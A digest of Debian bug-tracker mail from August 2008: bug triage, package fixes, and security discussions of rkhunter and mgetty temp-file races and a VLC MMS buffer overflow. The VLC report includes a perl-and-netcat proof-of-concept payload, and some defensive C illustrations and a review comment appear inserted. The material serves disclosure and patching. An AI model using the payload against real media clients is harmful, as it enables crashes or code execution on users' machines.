Processed: force merge all bugs around the broken build-conflict
Processing commands for [EMAIL PROTECTED]: # Just found the two other bugs about the issue forcemerge 495246 495108 496532 Bug#495246: version syntax error in Build-Conflicts (unexpanded substvar ${Source-Version}) Bug#495108: xosd source package control info contains unexpanded variable Bug#496532: Build-Conflict field is wrong Forcibly Merged 495108 495246 496532. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496748: jppy: Missing dependency on python-vobject
Package: jppy
Version: 0.0.47-1
Severity: grave
Justification: renders package unusable

Subject says it all:

jppy
Traceback (most recent call last):
  File "/usr/bin/jppy", line 3, in <module>
    import jppy
  File "/var/lib/python-support/python2.5/jppy/__init__.py", line 35, in <module>
    from vcard import load_vcards
  File "/var/lib/python-support/python2.5/jppy/vcard.py", line 3, in <module>
    import vobject

So a recommendation is not enough if I can't even start jppy without python-vobject.

Alex

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.26-1-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages jppy depends on:
ii  python               2.5.2-2    An interactive high-level object-o
ii  python-jppy          0.0.47-1   Python API to access J-Pilot conta

Versions of packages jppy recommends:
ii  jpilot               1.6.0-1    graphical app. to modify the conte
ii  python-vobject       0.6.0-1    parse iCalendar and VCards in Pyth
pn  txt2pdbdoc           <none>     (no description available)

Versions of packages jppy suggests:
ii  jppy-jpilot-plugins  0.0.47-1   J-Pilot plugins to integrate jppy
ii  mutt                 1.5.18-4   text-based mailreader supporting M

-- no debconf information
Bug#495209: marked as done (still fails to build on ia64)
Your message dated Wed, 27 Aug 2008 06:32:03 + with message-id [EMAIL PROTECTED] and subject line Bug#495209: fixed in guile-1.8 1.8.5+1-4 has caused the Debian Bug report #495209, regarding still fails to build on ia64 to be marked as done.

This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.)

--
495209: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=495209
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

---BeginMessage---
Package: guile-1.8
Version: 1.8.5+1-3
Severity: serious

see http://buildd.debian.org/fetch.cgi?pkg=guile-1.8&ver=1.8.5%2B1-3&arch=ia64&stamp=1218520791&file=log

the control file is missing the ia64 architecture
---End Message---
---BeginMessage---
Source: guile-1.8
Source-Version: 1.8.5+1-4

We believe that the bug you reported is fixed in the latest version of guile-1.8, which is due to be installed in the Debian FTP archive:

guile-1.8-dev_1.8.5+1-4_i386.deb to pool/main/g/guile-1.8/guile-1.8-dev_1.8.5+1-4_i386.deb
guile-1.8-doc_1.8.5+1-4_all.deb to pool/main/g/guile-1.8/guile-1.8-doc_1.8.5+1-4_all.deb
guile-1.8-libs_1.8.5+1-4_i386.deb to pool/main/g/guile-1.8/guile-1.8-libs_1.8.5+1-4_i386.deb
guile-1.8_1.8.5+1-4.diff.gz to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4.diff.gz
guile-1.8_1.8.5+1-4.dsc to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4.dsc
guile-1.8_1.8.5+1-4_i386.deb to pool/main/g/guile-1.8/guile-1.8_1.8.5+1-4_i386.deb

A summary of the changes between this version and the previous one is attached.

Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Rob Browning [EMAIL PROTECTED] (supplier of updated guile-1.8 package)

(This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED])

Format: 1.8
Date: Tue, 26 Aug 2008 22:58:14 -0700
Source: guile-1.8
Binary: guile-1.8 guile-1.8-dev guile-1.8-doc guile-1.8-libs
Architecture: source all i386
Version: 1.8.5+1-4
Distribution: unstable
Urgency: medium
Maintainer: Rob Browning [EMAIL PROTECTED]
Changed-By: Rob Browning [EMAIL PROTECTED]
Description:
 guile-1.8 - The GNU extension language and Scheme interpreter
 guile-1.8-dev - Development files for Guile 1.8
 guile-1.8-doc - Documentation for Guile 1.8
 guile-1.8-libs - Main Guile libraries
Closes: 495209
Changes:
 guile-1.8 (1.8.5+1-4) unstable; urgency=medium
 .
 * Change Architectures back to any where appropriate (i.e. include ia64).
 (closes: #495209)
---End Message---
Bug#496375: The possibility of attack with the help of symlinks in some Debian packages
Hi Alexander,

Many thanks for your email. I have been willing to review rkhunter bugs before submitting it.

On Wednesday 27 August 2008 at 04:00 +0400, Solar Designer wrote:
> FWIW, I happened to independently notice this and report it upstream a week ago:
>
> https://sourceforge.net/tracker/?func=detail&atid=794190&aid=1971965&group_id=155034
>
> While I am at it, I suggest that you change /tmp/rkhunter-debug to /var/run/rkhunter-debug. Right now, you have a security hole allowing for local root compromise, although indeed the race condition is hard to trigger in practice.
>
> To those reading this: please note that this suggestion by no means constitutes a security review of rkhunter by me.
>
> I notice that the Debian package was fixed to use mktemp; I think that a fixed filename under /var/run would be better in this case. Also, rkhunter could be patched to enforce mode 600 on the file, regardless of umask. (mktemp does that, but when a fixed filename under /var/run is used instead, that would need to be explicit.)
>
> Oh, and I was probably wrong about the race condition being hard to trigger - I forgot about directory notifications for a moment.

I am far from being a security expert. Do you suggest that using /var/run/rkhunter-debug is better than /tmp/rkhunter-debug. (created using mktemp)? or is that still using mktemp to create a /var/run/rkhunter-debug.XX file?

Can you explain why it is more secure? I am ready to patch rkhunter debian package, but need to be sure I understand well what I do!

Thanks again for your help.

Cheers,
Julien
Bug#496403: mgetty insecure temp file usage
Hi Thijs!

> # get unique directory name, using faxq-helper

This does not seem to be much of an issue beyond DoS, right? mkdir returns an error when $spooldir already exists. Yeah, 'mktemp -t -d' looks like a better alternative though...

> # if filename is -, use stdin

I noticed that the following patch has been used in all Fedora / Red Hat mgetty packages for quite some time now:

http://cvs.fedoraproject.org/viewvc/rpms/mgetty/devel/mgetty-1.1.30-mktemp.patch?view=markup

(it can possibly benefit from a few more Xes in the file name template too ;)

HTH

--
Tomas Hoger
Processed: tagging 490910
Processing commands for [EMAIL PROTECTED]:

# Automatically generated email from bts, devscripts version 2.9.26
tags 490910 + pending
Bug#490910: linux-2.6: CVE-2008-0598 information disclosure
Tags were: patch security
Tags added: pending

End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Processed: merge
Processing commands for [EMAIL PROTECTED]:

merge 496558 496678
Bug#496558: nautilus: Fails to browse
Bug#496678: nautilus: Fails to start
Merged 496558 496678.

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Processed: ...
Processing commands for [EMAIL PROTECTED]:

tags 496558 +confirmed
Bug#496558: nautilus: Fails to browse
There were no tags set.
Bug#496678: nautilus: Fails to start
Tags added: confirmed

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496375: The possibility of attack with the help of symlinks in some Debian packages
On Wed, Aug 27, 2008 at 09:06:58AM +0200, Julien Valroff wrote:
> Do you suggest that using /var/run/rkhunter-debug is better than /tmp/rkhunter-debug. (created using mktemp)?

Yes - primarily from usability standpoint. This time, having a fixed filename is better, and since rkhunter needs to be run as root anyway (does it?), /var/run should do and be safe. However, if I am wrong in my assumption that rkhunter requires root, then indeed /var/run is not appropriate - and the mktemp approach makes sense.

> or is that still using mktemp to create a /var/run/rkhunter-debug.XX file?

No.

> Can you explain why it is more secure?

That was not the point I was making. Rather, the point was/is that mktemp is normally used for program-internal and truly temporary files, and this time we have a file that is meant to be accessed by a human user - so a fixed filename in a directory only writable by root may be more appropriate.

However, once again, if rkhunter may reasonably be run by non-root (I just don't know, I've never used rkhunter), then mktemp -t ... may be appropriate as it will retain that capability.

Alexander
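An added illustration (not code from rkhunter or from either poster) of the approach discussed in the two messages above: a fixed filename in a directory only its owner can write, created exclusively and forced to mode 600 regardless of umask. The names open_private_log and debug.log and the /tmp/privlog-demo-* scratch directory are assumptions made for the demo.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open the fixed-name file `name` inside `dir` for writing.
 * Returns a file descriptor, or -1 with errno set. */
int open_private_log(const char *dir, const char *name)
{
    struct stat ds;
    int fd, saved;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);

    if (dfd < 0)
        return -1;
    /* A fixed name is only safe where nobody else can create entries:
     * the directory must be ours and not group- or world-writable. */
    if (fstat(dfd, &ds) != 0 || ds.st_uid != geteuid() ||
        (ds.st_mode & (S_IWGRP | S_IWOTH))) {
        close(dfd);
        errno = EPERM;
        return -1;
    }
    /* Remove a leftover from an earlier run. unlinkat() removes a
     * symlink itself, never the file it points to. */
    if (unlinkat(dfd, name, 0) != 0 && errno != ENOENT) {
        saved = errno;
        close(dfd);
        errno = saved;
        return -1;
    }
    /* O_EXCL refuses any existing entry, dangling symlinks included. */
    fd = openat(dfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    saved = errno;
    close(dfd);
    if (fd < 0) {
        errno = saved;
        return -1;
    }
    /* open()'s mode is filtered by umask; fchmod() sets exactly 0600. */
    if (fchmod(fd, 0600) != 0) {
        saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Constructed scenario in a scratch directory: a symlink named debug.log
 * points at a victim file. Returns 0 when the function behaved as intended. */
int demo(int world_writable)
{
    char dir[] = "/tmp/privlog-demo-XXXXXX";
    char victim[64], logp[64];
    struct stat st, ls, vs;
    mode_t old;
    int fd, rc = -1;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(logp, sizeof logp, "%s/debug.log", dir);
    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        goto out;
    close(fd);
    if (symlink("victim", logp) != 0)     /* the planted link */
        goto out;
    if (world_writable && chmod(dir, 0777) != 0)
        goto out;
    old = umask(0277);                    /* open() alone would yield 0400 */
    fd = open_private_log(dir, "debug.log");
    umask(old);
    if (world_writable) {
        rc = (fd < 0 && errno == EPERM) ? 0 : -1;   /* must be refused */
    } else if (fd >= 0 && write(fd, "log", 3) == 3 && fstat(fd, &st) == 0 &&
               lstat(logp, &ls) == 0 && stat(victim, &vs) == 0) {
        /* exact mode, link replaced by a regular file, victim untouched */
        rc = ((st.st_mode & 07777) == 0600 && S_ISREG(ls.st_mode) &&
              vs.st_size == 0) ? 0 : -1;
    }
    if (fd >= 0)
        close(fd);
out:
    unlink(logp);
    unlink(victim);
    rmdir(dir);
    return rc;
}

int main(void)
{
    printf("owner-only dir:     %s\n", demo(0) == 0 ? "ok" : "FAILED");
    printf("world-writable dir: %s\n", demo(1) == 0 ? "refused" : "FAILED");
    return 0;
}
```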
Bug#496558: nautilus: Fails to browser - confirmed
I found this error too (but on an etch version). And it seems to me that the last (security) upgrade of libxml2 and/or libxml2-utils caused this error.
Bug#496558: nautilus: Fails to browser - confirmed
On Wed, 27 Aug 2008 10:33:13 +0200, Dieter Faulbaum [EMAIL PROTECTED] wrote:
> I found this error too (but on an etch version). And it seems to me that the last (security) upgrade of libxml2 and/or libxml2-utils caused this error.

Could you please provide the exact version number of your installed nautilus? Have you tried downgrading libxml2 again?
Bug#493667: nfs-common: nfs quite broken
Hi,

I am experiencing the same problem in my lab, which has an etch nfs server. When stations are upgraded to nfs-common 1:1.1.3-1, users cannot access their files. Adding sec=sys to the client's mount options fixes the problem.

As I found the fix in the Debian bug report, I did not make yet another bug report. However, as you ask for the success of the proposed workaround, I can confirm it for my case. But I would like to know if you recommend adding this option on all clients or if you think it will be solved (in the kernel or in nfs-common) before this bug reaches testing (was it for lenny or lenny+1)

Best regards,
Vincent

--
Vincent Danjean GPG key ID 0x9D025E87 [EMAIL PROTECTED]
GPG key fingerprint: FC95 08A6 854D DB48 4B9A 8A94 0BF7 7867 9D02 5E87
Unofficial packages: http://www-id.imag.fr/~danjean/deb.html#package
APT repo: deb http://perso.debian.org/~vdanjean/debian unstable main
Bug#496758: Too late for lenny
Package: ia32-libs-tools
Version: 12
Severity: critical

This is just a reminder notice to stop any migrating to lenny. It took way too long to get ia32-libs-tools through NEW and there just isn't enough time left to get this tested and fixed properly.

Do not include ia32-libs-tools in lenny.

MfG
Goswin

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (400, 'unstable-i386')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.25-kvm-nofb (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages ia32-libs-tools depends on:
ii  aptitude                  0.4.11.8-1  terminal-based package manager
ii  build-essential           11.3        informational list of build-essent
ii  dctrl-tools [grep-dctrl]  2.13.0      Command-line tools to process Debi
ii  devscripts                2.10.33     scripts to make the life of a Debi
ii  libc6                     2.7-12      GNU C Library: Shared libraries
ii  libgcc1                   1:4.3.1-5   GCC support library
ii  libstdc++6                4.3.1-5     The GNU Standard C++ Library v3
ii  lsb-release               3.2-13      Linux Standard Base version report

ia32-libs-tools recommends no packages.

-- no debconf information
Bug#496625: Problem with multicast communication (plus solution)
On Tue, Aug 26, 2008 at 11:52:18AM -0500, Eric Evans wrote:
> Yes, you are correct. A fix for this was incorporated into the final release (1.5), which I uploaded to unstable last night. If you are in a position to test it, any feedback would be appreciated.

I tested ucarp 1.5-1 from unstable and all problems have gone away. Many thanks!

--
Piotr 'aniou' Meyer
Bug#495354: [DebianGIS-dev] Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file
severity 495354 normal
thanks

This is not grave, the package is perfectly usable with many other formats. I will investigate with upstream about that. Also consider that netcdf support is partially broken because hdf4 is historically built in a not completely gdal-compliant way. That is solved in experimental.

On Sat, Aug 16, 2008 at 11:29:29AM -0300, Paulo Marcondes wrote:
> Subject: gdal-bin: gdalinfo segfaults on a 6.2MiB netCDF file
> Package: gdal-bin
> Version: 1.5.2-3
> Severity: grave
> Justification: renders package unusable
>
> *** Please type your report below this line ***
>
> I got a segmentation fault when running gdalinfo 3n24s47w14w.grd
>
> file was downloaded from http://www.bodc.ac.uk/data/online_delivery/gebco/select/
>
> $ ls -lh *.grd
> -rw-r--r-- 1 marcondes marcondes 6,2M Ago 16 00:46 3n24s47w14w.grd
>
> file is attached as bzip2 file.

--
Francesco P. Lovergine
Processed: Re: [DebianGIS-dev] Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file
Processing commands for [EMAIL PROTECTED]:

severity 495354 normal
Bug#495354: gdalinfo segfaults on a 6.2Mib netCDF file
Bug#495353: gdal-bin: gdalinfo segfaults on a 6.2Mib netCDF file
Severity set to `normal' from `grave'

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Processed: Re: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]:

severity 496382 normal
Bug#496382: The possibility of attack with the help of symlinks in some Debian packages
Severity set to `normal' from `grave'

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#496122: new upstream version of libfile-sharedir-perl
Hi,

libfile-sharedir-perl currently has a grave bug because the directory layout used to store data has changed. This means the package is unusable for Perl distributions whose name contains a - and a recent Module::Install (= 0.76, released on 17 Jul 2008 and included in Lenny), see #496122.

This was fixed in version 0.99_01 (also released as 1.00 without changes), which was released coordinated with Module::Install on Jul 17th.

Besides updating tests and the build system (new version of Module::Install) there are only two non-bugfix changes in the new upstream release:

* A new function `class_file' that will look for data files in the namespaces of parent classes (36 lines long), and
* the other `*_file' functions will allow searching for any kind of path, not only regular files (changes some tests for (regular) files to tests if path exists)

As these other changes are not very large, I would like to know if the release team would accept the new upstream release for Lenny instead of backporting the fixes and updates to tests.

Regards,
Ansgar

Links to upstream tarballs:
0.05 - http://search.cpan.org/CPAN/authors/id/A/AD/ADAMK/File-ShareDir-0.05.tar.gz
1.00 - http://search.cpan.org/CPAN/authors/id/A/AD/ADAMK/File-ShareDir-1.00.tar.gz

Full changelog for upstream changes:

1.00 Thu 17 Jul 2008
 - Everything appears ok, release prod

0.99_01 Thu 10 Jul 2009
 - Updating tests a little
 - Adding the class_file function
 - Allow *_file to find any kind of path, not just files (hdp)
 - Localising $@ during evals
 - Implementing the new sharedir model

Diffstat between 0.05 and 1.00:

 Changes                        |  10
 MANIFEST                       |   7
 META.yml                       |  27 +
 Makefile.PL                    |  22 -
 README                         |  41 ++
 foo/test_file.txt              |   1
 inc/Module/Install.pm          | 437 ---
 inc/Module/Install/Base.pm     |   6
 inc/Module/Install/Can.pm      |   2
 inc/Module/Install/Fetch.pm    |   2
 inc/Module/Install/Makefile.pm | 333 +++--
 inc/Module/Install/Metadata.pm | 650 +
 inc/Module/Install/Share.pm    |  45 ++
 inc/Module/Install/Win32.pm    |  13
 inc/Module/Install/WriteAll.pm |  55 +--
 lib/File/ShareDir.pm           | 253 ++-
 share/subdir/sample.txt        |   7
 t/01_compile.t                 |  13
 t/02_main.t                    |  52 +--
 t/97_meta.t                    |  27 +
 t/98_pod.t                     |  32 ++
 t/99_pmv.t                     |  27 +
 t/99_pod.t                     |  36 --
 t/lib/ShareDir.pm              |  11
 24 files changed, 1385 insertions(+), 724 deletions(-)

Changes to lib/File/ShareDir.pm (minus documentation only hunks):

The internal function _dist_packfile is not used anywhere.

--- File-ShareDir-0.05/lib/File/ShareDir.pm 2006-09-04 02:52:56.0 +0200 +++ File-ShareDir-1.00/lib/File/ShareDir.pm 2008-07-17 09:58:40.0 +0200 
@@ -104,22 +107,29 @@ use 5.005; use strict; -use base 'Exporter'; use Carp 'croak'; +use Config (); +use Exporter (); use File::Spec (); use Params::Util '_CLASS'; use Class::Inspector (); -use vars qw{$VERSION $IS_MACOS @EXPORT_OK %EXPORT_TAGS}; +use vars qw{$VERSION @ISA @EXPORT_OK %EXPORT_TAGS}; BEGIN { - $VERSION = '0.05'; - $IS_MACOS= $^O eq 'MacOS'; - @EXPORT_OK = qw{dist_dir dist_file module_dir module_file}; + $VERSION = '1.00'; + @ISA = qw{ Exporter }; + @EXPORT_OK = qw{ + dist_dir dist_file + module_dir module_file + class_dir class_file + }; %EXPORT_TAGS = ( ALL = [ @EXPORT_OK ], - ); + ); } +use constant IS_MACOS = !!($^O eq 'MacOS'); + The Cdist_dir function takes a single parameter of the name of an @@ -145,11 +155,49 @@ sub dist_dir { my $dist = _DIST(shift); + my $dir; + + # Try the new version + $dir = _dist_dir_new( $dist ); + return $dir if defined $dir; + + # Fall back to the legacy version + $dir = _dist_dir_old( $dist ); + return $dir if defined $dir; + + # Ran out of options + croak(Failed to find share dir for dist '$dist'); +} + +sub _dist_dir_new { + my $dist = shift; + + # Create the subpath + my $path = File::Spec-catdir( + 'auto', 'share', 'dist', $dist, + ); + + # Find the full dir withing @INC + foreach my $inc ( @INC ) { + next unless defined $inc and ! ref $inc; + my $dir = File::Spec-catdir( $inc, $path ); + next unless -d
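Review bot: in the dist_dir hunk, the new-layout lookup wins unconditionally: dist_dir() returns whatever _dist_dir_new() finds and consults _dist_dir_old() only when that is undefined, so a leftover auto/share/dist/<dist> directory anywhere in @INC takes precedence over a legacy install. That ordering deserves a sentence in the POD and a test with both layouts present. In _dist_dir_new() the comment "Find the full dir withing @INC" should read "within", and the excerpt stops at "next unless -d", so the rest of the loop cannot be reviewed from what is shown.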
Bug#496265: marked as done (vlc: buffer overflow in mms handling)
Your message dated Wed, 27 Aug 2008 09:47:13 + with message-id [EMAIL PROTECTED] and subject line Bug#496265: fixed in vlc 0.8.6.i-2 has caused the Debian Bug report #496265, regarding vlc: buffer overflow in mms handling to be marked as done.

This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.)

--
496265: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496265
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems

---BeginMessage---
Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security

Hi,
the following security issue was published for vlc

static int mms_ReceiveCommand( access_t *p_access )
{
    access_sys_t *p_sys = p_access->p_sys;

    for( ;; )
    {
        int i_used;
        int i_status;

        if( NetFillBuffer( p_access ) < 0 )
        {
            msg_Warn( p_access, "cannot fill buffer" );
            return VLC_EGENERIC;
        }
        if( p_sys->i_buffer_tcp > 0 )
        {
[1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                         p_sys->i_buffer_tcp, &i_used );
[2]         if( i_used < MMS_BUFFER_SIZE )
            {
[3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                         MMS_BUFFER_SIZE - i_used );//BUG! i_used overflow
(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

static int mms_ParseCommand( access_t *p_access, uint8_t *p_data,
                             int i_data, int *pi_used )
(...)
    i_length = GetDWLE( p_data + 8 ) + 16;
(...)
    if( i_length > p_sys->i_cmd )
    {
        msg_Warn( p_access, "truncated command (missing %d bytes)",
                  i_length - i_data );
        p_sys->i_command = 0;
        return -1;
    }
[1] else if( i_length < p_sys->i_cmd )
    {
        p_sys->i_cmd = i_length;
[2]     *pi_used = i_length;
    }
(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- - Proof of concept -
on localhost:
perl -e 'print \xce\xfa\x0b\xb0\xef\xff\xef\xff; print ax100' headshot
nc -l -v -p 1755 headshot
open this url in VLC: mmst://127.0.0.1/

I can confirm this issue exists. Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original advisory.

I'll follow up on this bug report with a CVE id soon.

Kind regards
Nico

--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
---End Message---
---BeginMessage---
Source: vlc
Source-Version: 0.8.6.i-2

We believe that the bug you reported is fixed in the latest version of vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.i-2_amd64.deb to pool/main/v/vlc/libvlc0-dev_0.8.6.i-2_amd64.deb
libvlc0_0.8.6.i-2_amd64.deb to pool/main/v/vlc/libvlc0_0.8.6.i-2_amd64.deb
mozilla-plugin-vlc_0.8.6.i-2_amd64.deb to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
vlc-nox_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-nox_0.8.6.i-2_amd64.deb
vlc-plugin-arts_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-arts_0.8.6.i-2_amd64.deb
vlc-plugin-esd_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-esd_0.8.6.i-2_amd64.deb
vlc-plugin-ggi_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.i-2_amd64.deb
vlc-plugin-jack_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-jack_0.8.6.i-2_amd64.deb
vlc-plugin-sdl_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.i-2_amd64.deb
vlc-plugin-svgalib_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
vlc_0.8.6.i-2.diff.gz to pool/main/v/vlc/vlc_0.8.6.i-2.diff.gz
vlc_0.8.6.i-2.dsc to pool/main/v/vlc/vlc_0.8.6.i-2.dsc
vlc_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc_0.8.6.i-2_amd64.deb

A summary of the changes between this version and the previous one is attached.
Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sam Hocevar (Debian packages) [EMAIL PROTECTED] (supplier of updated vlc package)

(This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED])

Format: 1.8
Date: Tue, 26 Aug 2008
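An added illustration (not VLC's code and not the fix shipped in 0.8.6.i-2) of the signedness flaw described in the bug report above, beside one way to bound the length field before it is used as an offset. BUF_SIZE, the helper names and the header bytes are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64u   /* stand-in for MMS_BUFFER_SIZE; value assumed */
#define HDR_SIZE 16u   /* the "+ 16" added to the length field */

/* Read a little-endian 32-bit value, as GetDWLE does in the report. */
static uint32_t get_dwle(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Length as the reported code computes it: stored in a signed int, so a
 * large field value comes out negative. */
int legacy_length(const uint8_t *data)
{
    return (int32_t)(get_dwle(data + 8) + HDR_SIZE);
}

/* The reported guard, "i_used < MMS_BUFFER_SIZE": true for every
 * negative i_used, so it does not protect the memmove that follows. */
int legacy_guard_passes(int i_used)
{
    return i_used < (int)BUF_SIZE;
}

/* Hardened length check: do the arithmetic in a wider unsigned type and
 * require the whole command to lie inside the bytes actually received. */
int checked_length(const uint8_t *data, size_t avail, size_t *used)
{
    uint64_t total;

    if (avail < HDR_SIZE || avail > BUF_SIZE)
        return -1;
    total = (uint64_t)get_dwle(data + 8) + HDR_SIZE;
    if (total > avail)
        return -1;              /* truncated or implausible length */
    *used = (size_t)total;
    return 0;
}

/* Drop one parsed command from the front of the buffer. The move length
 * is derived from the fill level, never from the untrusted field alone. */
int consume_command(uint8_t *buf, size_t *fill)
{
    size_t used;

    if (checked_length(buf, *fill, &used) != 0)
        return -1;
    memmove(buf, buf + used, *fill - used);
    *fill -= used;
    return 0;
}

int main(void)
{
    uint8_t buf[BUF_SIZE] = {0};
    size_t fill = 32;

    /* Constructed header: length field 0xFFFFFFE0 at offset 8. */
    buf[8] = 0xe0; buf[9] = 0xff; buf[10] = 0xff; buf[11] = 0xff;

    printf("legacy length: %d, legacy guard passes: %d\n",
           legacy_length(buf), legacy_guard_passes(legacy_length(buf)));
    printf("hardened consume: %d (fill stays %zu)\n",
           consume_command(buf, &fill), fill);
    return 0;
}
```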
Bug#495712: wine: does not start
On Tue, Aug 19, 2008 at 11:21:52PM +0200, M. KLEIN wrote:
> Package: wine
> Version: 1.0.0-1
> Severity: grave
> Justification: renders package unusable
>
> [EN]
> Any wine* command (wine, winecfg ...) produces the following message, but nothing else happens:
>
> /usr/bin/wine: line 63: /usr/lib/wine/wine.bin: Aucun fichier ou répertoire de ce type
> /usr/bin/wine: line 63: /usr/lib/wine/wine.bin: Succès
>
> I've tried to purge wine package, without success.

This isn't a general bug, since I've tried to successfully run apps with both amd64 and i386.

How exactly did you start wine?

Aucun fichier ou répertoire de ce type means No such file or directory I suppose?

Can you please post the output of ls /usr/lib/wine/wine.bin?

Cheers,
Moritz
Bug#496382: The possibility of attack with the help of symlinks in some Debian packages
severity 496382 normal
thanks

On Sun, Aug 24, 2008 at 10:05:30PM +0400, Dmitry E. Oboukhov wrote:
> Package: bulmages-servers
> Severity: grave
>
> Binary-package: bulmages-servers (0.11.1-2)
> file: /usr/share/bulmages/examples/scripts/actualizabulmacont
> file: /usr/share/bulmages/examples/scripts/installbulmages-db
> file: /usr/share/bulmages/examples/scripts/creabulmafact
> file: /usr/share/bulmages/examples/scripts/creabulmacont
> file: /usr/share/bulmages/examples/scripts/actualizabulmafact

I'm lowering the severity since the affected scripts are only example scripts.

Cheers,
Moritz
Processed: Remove forwarded tag
Processing commands for [EMAIL PROTECTED]:

# The upstream bug is for xmonad, and this issue is unrelated.
notforwarded 496677
Bug#496677: Cairo backend unusable on 64-bit architectures
Removed annotation that Bug had been forwarded to https://savannah.gnu.org/bugs/index.php?24083.

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Processed: update found field...
Processing commands for [EMAIL PROTECTED]:

# as reported by Dieter Faulbaum...
found 496558 2.4.13-11+b1
Bug#496558: nautilus: Fails to browse
Bug#496678: nautilus: Fails to start
Bug marked as found in version 2.4.13-11+b1.

thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)
Bug#493883: marked as done ([manpages-it] Uninstallable due to overwrite try of /usr/share/man/it/man1/hman.1.gz)
Your message dated Wed, 27 Aug 2008 11:17:03 + with message-id [EMAIL PROTECTED] and subject line Bug#493883: fixed in man-pages-it 2.80-3 has caused the Debian Bug report #493883, regarding [manpages-it] Uninstallable due to overwrite try of /usr/share/man/it/man1/hman.1.gz to be marked as done.

This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.)

--
